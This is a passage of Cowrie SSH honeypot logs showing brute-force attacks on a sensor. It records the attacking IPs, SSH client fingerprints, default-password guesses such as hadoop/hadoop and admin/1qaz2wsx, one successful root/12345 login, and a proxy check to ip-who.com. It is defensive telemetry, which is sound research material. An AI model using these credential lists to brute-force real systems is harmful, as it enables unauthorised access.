sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:59:16.641040Z","src_ip":"212.227.125.160","session":"fdb3a8e0e96b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:59:20.776448Z","src_ip":"212.227.125.160","session":"6c930c48c36e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:59:21.027227Z","src_ip":"212.227.125.160","session":"6c930c48c36e"}
{"eventid":"cowrie.session.closed","duration":"70.8","message":"Connection lost after 70.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:59:28.969944Z","src_ip":"212.227.125.160","session":"d862d3262e8f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52584,"dst_ip":"1.2.3.4","dst_port":22,"session":"b30d56769869","protocol":"ssh","message":"New connection: 217.72.205.35:52584 (1.2.3.4:22) [session: b30d56769869]","sensor":"my-vps","timestamp":"2025-08-28T00:59:40.490758Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:59:40.491934Z","src_ip":"217.72.205.35","session":"b30d56769869"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":41296,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d32472fdaf9","protocol":"ssh","message":"New connection: 80.94.95.15:41296 (1.2.3.4:22) [session: 3d32472fdaf9]","sensor":"my-vps","timestamp":"2025-08-28T01:00:22.774931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T01:00:22.775893Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T01:00:22.826844Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:23.113755Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc123","message":"login attempt [hadoop/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:24.167616Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd123","message":"login attempt [hadoop/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:25.221039Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd1234","message":"login attempt [hadoop/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:26.274570Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc1234","message":"login attempt [hadoop/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:27.328075Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:00:28.381219Z","src_ip":"80.94.95.15","session":"3d32472fdaf9"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":35700,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e6fd32a120","protocol":"ssh","message":"New connection: 194.233.79.134:35700 (1.2.3.4:22) [session: d3e6fd32a120]","sensor":"my-vps","timestamp":"2025-08-28T01:00:46.238155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:00:46.289005Z","src_ip":"194.233.79.134","session":"d3e6fd32a120"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:00:46.415664Z","src_ip":"194.233.79.134","session":"d3e6fd32a120"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:48.595376Z","src_ip":"194.233.79.134","session":"d3e6fd32a120"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:00:49.811440Z","src_ip":"194.233.79.134","session":"d3e6fd32a120"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:00:50.216356Z","src_ip":"212.227.125.160","session":"fdb3a8e0e96b"}
{"eventid":"cowrie.session.closed","duration":"97.3","message":"Connection lost after 97.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:00:53.635756Z","src_ip":"212.227.125.160","session":"fdb3a8e0e96b"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":60744,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbe8f80baf69","protocol":"ssh","message":"New connection: 171.243.150.245:60744 (1.2.3.4:22) [session: dbe8f80baf69]","sensor":"my-vps","timestamp":"2025-08-28T01:00:55.362474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:00:56.044200Z","src_ip":"171.243.150.245","session":"dbe8f80baf69"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:00:56.137397Z","src_ip":"171.243.150.245","session":"dbe8f80baf69"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-28T01:01:01.615848Z","src_ip":"171.243.150.245","session":"dbe8f80baf69"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:01:03.343720Z","src_ip":"171.243.150.245","session":"dbe8f80baf69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45866,"dst_ip":"1.2.3.4","dst_port":22,"session":"993484a9e34f","protocol":"ssh","message":"New connection: 212.227.235.229:45866 (1.2.3.4:22) [session: 993484a9e34f]","sensor":"my-vps","timestamp":"2025-08-28T01:01:08.512616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:01:08.513976Z","src_ip":"212.227.235.229","session":"993484a9e34f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T01:01:08.617928Z","src_ip":"212.227.235.229","session":"993484a9e34f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1qaz2wsx","message":"login attempt [admin/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T01:01:08.931241Z","src_ip":"212.227.235.229","session":"993484a9e34f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:01:10.038549Z","src_ip":"212.227.235.229","session":"993484a9e34f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56804,"dst_ip":"1.2.3.4","dst_port":22,"session":"a39e19478d57","protocol":"ssh","message":"New connection: 212.227.125.160:56804 (1.2.3.4:22) [session: a39e19478d57]","sensor":"my-vps","timestamp":"2025-08-28T01:01:14.776128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:01:14.781646Z","src_ip":"212.227.125.160","session":"a39e19478d57"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:01:15.022821Z","src_ip":"212.227.125.160","session":"a39e19478d57"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:01:20.842692Z","src_ip":"212.227.125.160","session":"a39e19478d57"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T01:01:21.084726Z","session":"a39e19478d57"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T01:01:21.332353Z","src_ip":"212.227.125.160","session":"a39e19478d57"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:01:22.107000Z","src_ip":"212.227.125.160","session":"a39e19478d57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44544,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a587527bf1d","protocol":"ssh","message":"New connection: 212.227.125.160:44544 (1.2.3.4:22) [session: 3a587527bf1d]","sensor":"my-vps","timestamp":"2025-08-28T01:01:32.145243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-HELLOWORLD","message":"Remote SSH version: SSH-2.0-HELLOWORLD","sensor":"my-vps","timestamp":"2025-08-28T01:01:32.146213Z","src_ip":"212.227.125.160","session":"3a587527bf1d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:01:32.425506Z","src_ip":"212.227.125.160","session":"3a587527bf1d"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":58462,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a9a0f827305","protocol":"ssh","message":"New connection: 171.243.150.245:58462 (1.2.3.4:22) [session: 0a9a0f827305]","sensor":"my-vps","timestamp":"2025-08-28T01:02:05.525068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:02:05.526835Z","src_ip":"171.243.150.245","session":"0a9a0f827305"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T01:02:05.742772Z","src_ip":"171.243.150.245","session":"0a9a0f827305"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":53010,"dst_ip":"1.2.3.4","dst_port":22,"session":"42d4da59cb33","protocol":"ssh","message":"New connection: 171.243.150.245:53010 (1.2.3.4:22) [session: 42d4da59cb33]","sensor":"my-vps","timestamp":"2025-08-28T01:02:32.296973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T01:02:32.333887Z","src_ip":"171.243.150.245","session":"42d4da59cb33"}
